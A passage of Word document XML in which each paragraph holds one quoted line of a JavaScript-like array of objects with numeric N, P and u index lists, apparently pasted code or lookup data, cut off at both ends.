        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1950479D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D8133A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77665818" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4E85E8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B73F26A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A27C43F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A06267" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEBE820" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [11, 38, 42, 46, 49, 79, 96, 121, 145, 171, 210, 221, 233, 234, 268, 280, 305, 310]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E35043D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F09897" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631A9938" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74D450" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [45, 113, 244]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3301B8CF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641BBC6E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1718C2FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFD6DDB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C2D65" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3516566E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FE9287" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25481358" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 41, 128]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591AE9B0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883F327" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791426C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520E488" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EC0475" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E73C82E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD37816" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB2A2A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0915F500" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A64B3CE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74529F27" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B099A6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32034029" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C129FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7447CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F306C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B578D1C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CD20F9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3076B3F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E2FDD2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23303B21" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5932AA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F956C8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C832B3E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6, 16, 19, 178, 288]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1EDBA3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDCEEA1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBB7E57" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EAA027" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EDC1F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1F76F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1522C1B0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716D3103" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [18, 23, 24, 35, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FE2326" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24972161" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E83F08" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC709F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD656CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC9291" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721FC94C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487A55EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183F65E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53350B9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350B3E75" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [9, 10, 11, 15, 17, 19, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B67DFBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 4, 5, 6, 7, 8, 12, 13, 14, 16, 18, 20, 21, 22, 157, 159, 182, 196, 245, 311, 317, 342]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFEB884" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F9608C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F97E00" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63A71C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 11, 12]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790EA03B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4125E714" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661EB69E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4350A8C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086700C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7294C3A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [11],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5021D752" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16, 17],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4E4AEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [14, 23, 27, 40, 71, 108, 134, 140, 200, 219, 232, 249, 260, 277, 282, 283, 298, 303, 319, 330, 343, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9CE2F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BB6C5A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71389E12" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6, 7, 8, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24150F87" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 9, 11, 16, 17, 22, 24, 27, 28, 29, 56, 138, 159, 175, 317, 335]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5701729A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D965F80" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDA9E5F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA7981" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09141F49" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6400E9B1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121211A8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C1227" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 10, 20, 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D913DE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FFC72A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A887BB7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FECCB6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A00228E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323A8385" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D4484E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE69AA6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7A2A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B6C989" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E7ECF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0033B693" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [18, 19, 23, 25, 34, 37, 39, 41, 48, 159, 245, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEFE41E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F2E03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 2, 0, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21650C86" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E2594" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1481C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC25434" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D25243B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EBE75E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3917C569" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD12D4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC82603" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B66F025" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 15, 22, 32, 35, 197]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771797FA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2E382C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2DCE9F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C6D0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD0438C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BC11C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4102B072" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E540" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 35]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6287F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6505EB29" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [26, 7, 25, 15, 20, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B7018" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 23, 24, 25, 26, 27, 28, 29],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA80749" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22, 56, 91, 124, 128, 138, 143, 159, 175, 245, 311, 317, 329, 335, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C48B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEDB1F3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
